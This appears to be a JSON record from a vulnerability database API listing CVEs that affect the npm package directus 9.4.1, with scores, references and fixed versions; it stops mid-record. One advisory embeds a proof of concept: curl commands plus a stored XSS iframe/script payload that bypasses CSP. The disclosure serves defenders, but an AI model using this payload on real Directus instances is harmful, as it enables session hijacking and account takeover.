Package Instance
Look up vulnerable packages by Package URL.
GET /api/packages/548153?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/548153?format=api", "purl": "pkg:npm/directus@9.4.1", "type": "npm", "namespace": "", "name": "directus", "version": "9.4.1", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "11.17.0", "latest_non_vulnerable_version": "11.17.0", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/105428?format=api", "vulnerability_id": "VCID-32e6-c1bv-efea", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Starting in version 9.0.0 and prior to version 11.9.0, when using Directus Flows with the WebHook trigger all incoming request details are logged including security sensitive data like access and refresh tokens in cookies. Malicious admins with access to the logs can hijack the user sessions within the token expiration time of them triggering the Flow. Version 11.9.0 fixes the issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53886", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0031", "scoring_system": "epss", "scoring_elements": "0.54729", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.0031", "scoring_system": "epss", "scoring_elements": "0.54713", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.0031", "scoring_system": "epss", "scoring_elements": "0.54588", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53886" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53886", "reference_id": "", 
"reference_type": "", "scores": [ { "value": "4.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53886" }, { "reference_url": "https://github.com/directus/directus/commit/22be460c76957708d67fdd52846a9ad1cbb083fb", "reference_id": "22be460c76957708d67fdd52846a9ad1cbb083fb", "reference_type": "", "scores": [ { "value": "4.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:41:05Z/" } ], "url": "https://github.com/directus/directus/commit/22be460c76957708d67fdd52846a9ad1cbb083fb" }, { "reference_url": "https://github.com/directus/directus/pull/25354", "reference_id": "25354", "reference_type": "", "scores": [ { "value": "4.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:41:05Z/" } ], "url": "https://github.com/directus/directus/pull/25354" }, { "reference_url": "https://github.com/advisories/GHSA-f24x-rm6g-3w5v", "reference_id": "GHSA-f24x-rm6g-3w5v", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-f24x-rm6g-3w5v" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-f24x-rm6g-3w5v", "reference_id": "GHSA-f24x-rm6g-3w5v", "reference_type": "", "scores": [ { "value": "4.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": 
"generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:41:05Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-f24x-rm6g-3w5v" }, { "reference_url": "https://github.com/directus/directus/releases/tag/v11.9.0", "reference_id": "v11.9.0", "reference_type": "", "scores": [ { "value": "4.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:41:05Z/" } ], "url": "https://github.com/directus/directus/releases/tag/v11.9.0" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/378353?format=api", "purl": "pkg:npm/directus@11.9.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.9.0" } ], "aliases": [ "CVE-2025-53886", "GHSA-f24x-rm6g-3w5v" ], "risk_score": 3.1, "exploitability": "0.5", 
"weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-32e6-c1bv-efea" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/40734?format=api", "vulnerability_id": "VCID-54ja-4vrx-tbgm", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. An unauthenticated user can access credentials of last authenticated user via OpenID or OAuth2 where the authentication URL did not include redirect query string. This happens because on that endpoint for both OpenId and Oauth2 Directus is using the respond middleware, which by default will try to cache GET requests that met some conditions. Although, those conditions do not include this scenario, when an unauthenticated request returns user credentials. This vulnerability is fixed in 10.13.3 and 11.1.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-45596", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00753", "scoring_system": "epss", "scoring_elements": "0.7374", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00753", "scoring_system": "epss", "scoring_elements": "0.7365", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00753", "scoring_system": "epss", "scoring_elements": "0.73741", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00753", "scoring_system": "epss", "scoring_elements": "0.73725", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-45596" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], 
"url": "https://github.com/directus/directus" }, { "reference_url": "https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428" }, { "reference_url": "https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459" }, { "reference_url": "https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b", "reference_id": "4aace0bbe57232e38cd6a287ee475293e46dc91b", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-10T19:20:20Z/" } ], "url": 
"https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b" }, { "reference_url": "https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52", "reference_id": "769fa22797bff5a9231599883b391e013f122e52", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-10T19:20:20Z/" } ], "url": "https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45596", "reference_id": "CVE-2024-45596", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45596" }, { "reference_url": "https://github.com/advisories/GHSA-cff8-x7jv-4fm8", "reference_id": "GHSA-cff8-x7jv-4fm8", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cff8-x7jv-4fm8" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8", "reference_id": "GHSA-cff8-x7jv-4fm8", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N" }, { "value": "HIGH", 
"scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-10T19:20:20Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/33327?format=api", "purl": "pkg:npm/directus@10.13.3", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/33329?format=api", "purl": "pkg:npm/directus@11.1.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-3u2p-nh39-5qag" }, { "vulnerability": "VCID-3vnr-k31f-vycv" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-ghbw-eqaz-jqhs" }, { "vulnerability": "VCID-jtg3-4cp8-8fe6" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { 
"vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.1.0" } ], "aliases": [ "CVE-2024-45596", "GHSA-cff8-x7jv-4fm8" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-54ja-4vrx-tbgm" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360571?format=api", "vulnerability_id": "VCID-79ch-vtkp-q3cd", "summary": "Directus has a DOM-Based cross-site scripting (XSS) via layout_options\n### Impact\nDirectus allows an authenticated attacker to save cross site scripting code to the database. This is possible because the application injects an attacker-controlled parameter that will be stored in the server and used by the client into an unsanitized DOM element. When chained with [CVE-2024-6534](https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86), it could result in account takeover.\n\n### PoC\nTo exploit this vulnerability, we need to do the following steps using a non-administrative, default role attacker account.\n\n1. Upload the following JavaScript file.\n\nUsing the upload functionality at `POST /files`. 
This PoC will show an alert message.\n\n```js\nexport TARGET_HOST=\"http://localhost:8055\"\nexport ATTACKER_EMAIL=\"malicious@malicious.com\"\nexport ATTACKER_PASSWORD=\"123456\"\nroot_dir=$(dirname $0)\nmkdir \"${root_dir}/static\"\n\ncurl -s -k -o /dev/null -w \"%{http_code}\" -X 'POST' \"${TARGET_HOST}/auth/login\" \\\n -c \"${root_dir}/static/attacker_directus_session_token\" \\\n -H 'Content-Type: application/json' \\\n -d \"{\\\"email\\\":\\\"${ATTACKER_EMAIL}\\\",\\\"password\\\":\\\"${ATTACKER_PASSWORD}\\\",\\\"mode\\\":\\\"session\\\"}\"\n\nid_url_file=$(echo \"alert('Successful DOM-based XSS')\" |\n curl -s -k -X 'POST' \"${TARGET_HOST}/files\" \\\n -b \"${root_dir}/static/attacker_directus_session_token\" \\\n -F \"file=@-;type=application/x-javascript;filename=poc.js\" | jq -r \".data.id\")\n```\n\n2. Create a preset for a collection and store the preset ID.\n\nOr use a preset already created from GET /presets. The following example uses the direct_users preset.\n\n```\nattacker_user_id=$(curl -s -k \"${TARGET_HOST}/users/me\" \\ -b \"${root_dir}/static/attacker_directus_session_token\" | jq -r \".data.id\") curl -i -s -k -X 'POST' \"${TARGET_HOST}/presets\" \\ -H 'Content-Type: application/json' \\ -b \"${root_dir}/static/attacker_directus_session_token\" \\ --data-binary \"{\\\"layout\\\":\\\"cards\\\",\\\"bookmark\\\":null,\\\"role\\\":null,\\\"user\\\":\\\"${attacker_user_id}\\\",\\\"search\\\":null,\\\"filter\\\":null,\\\"layout_query\\\":{\\\"cards\\\":{\\\"sort\\\":[\\\"email\\\"]}},\\\"layout_options\\\":{\\\"cards\\\":{\\\"icon\\\":\\\"account_circle\\\",\\\"title\\\":\\\"<iframe srcdoc=\\\\\\\"<script src='http://localhost:8055/assets/${id_url_file}'> </script>\\\\\\\">\\\",\\\"subtitle\\\":\\\"{{ email }}\\\",\\\"size\\\":4}},\\\"refresh_interval\\\":null,\\\"icon\\\":\\\"bookmark\\\",\\\"color\\\":null,\\\"collection\\\":\\\"directus_users\\\"}\"\n```\n\nWhen the user visits the view that uses the directus_users preset, the JavaScript file 
will be executed.\n\nNotes:\n\nNeed to use an iframe to execute the malicious JavaScript file to bypass the CSP policies. The payload structure is `<iframe srcdoc=\\\"<script src='URL_MALICIOUS_FILE'> </script>\\\">`.\n\nWe can target any collection that uses the vulnerable template structure that renders the layout option section.\n\nIn this PoC, the target is the same user who sends the payload, but if the attacking user has permission to modify or create presets for other users or even if he does not have permissions but can chain with CVE-2024-6534, he can achieve an account takeover.", "references": [ { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:N/I:L/A:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-9qrm-48qf-r2rw", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:N/I:L/A:N" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-9qrm-48qf-r2rw" }, { "reference_url": "https://github.com/advisories/GHSA-9qrm-48qf-r2rw", "reference_id": "GHSA-9qrm-48qf-r2rw", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9qrm-48qf-r2rw" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/377107?format=api", "purl": "pkg:npm/directus@11.3.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": 
"VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-3u2p-nh39-5qag" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.3.3" } ], "aliases": [ "GHSA-9qrm-48qf-r2rw" ], "risk_score": 1.6, "exploitability": "0.5", "weighted_severity": "3.1", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-79ch-vtkp-q3cd" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/166718?format=api", "vulnerability_id": "VCID-8ch7-zwuu-zufp", "summary": "In Directus before 9.7.0, the default settings of CORS_ORIGIN and CORS_ENABLED are true.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-26969", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00909", "scoring_system": "epss", "scoring_elements": "0.76336", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00909", "scoring_system": 
"epss", "scoring_elements": "0.76345", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00909", "scoring_system": "epss", "scoring_elements": "0.7635", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00909", "scoring_system": "epss", "scoring_elements": "0.76265", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-26969" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://github.com/directus/directus/pull/12022", "reference_id": "12022", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/" } ], "url": "https://github.com/directus/directus/pull/12022" }, { "reference_url": "https://github.com/directus/directus/blob/8daed9c41baeaf1d08c1e292bf9f0dcef65e48fb/docs/configuration/config-options.md", "reference_id": "config-options.md", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/" } ], "url": "https://github.com/directus/directus/blob/8daed9c41baeaf1d08c1e292bf9f0dcef65e48fb/docs/configuration/config-options.md" }, { "reference_url": 
"https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS", "reference_id": "CORS", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/" } ], "url": "https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2022-26969", "reference_id": "CVE-2022-26969", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-26969" }, { "reference_url": "https://github.com/advisories/GHSA-g27j-74fp-xfpr", "reference_id": "GHSA-g27j-74fp-xfpr", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-g27j-74fp-xfpr" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-g27j-74fp-xfpr", "reference_id": "GHSA-g27j-74fp-xfpr", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-g27j-74fp-xfpr" }, { "reference_url": "https://security.snyk.io/vuln/SNYK-JS-DIRECTUS-2441822", "reference_id": "SNYK-JS-DIRECTUS-2441822", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/" } ], "url": "https://security.snyk.io/vuln/SNYK-JS-DIRECTUS-2441822" }, { "reference_url": "https://github.com/directus/directus/releases/tag/v9.7.0", "reference_id": "v9.7.0", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/" } ], "url": "https://github.com/directus/directus/releases/tag/v9.7.0" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/20019?format=api", "purl": "pkg:npm/directus@9.7.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-9t8b-59vc-kbea" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-b8ya-2bmn-e3h5" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-bsua-aktm-1qfd" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-eb1b-zvas-muey" }, { "vulnerability": "VCID-eyv5-91cq-pyf9" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jvtg-cnnb-7ubg" }, { "vulnerability": "VCID-jy2x-jbbb-zua5" }, { 
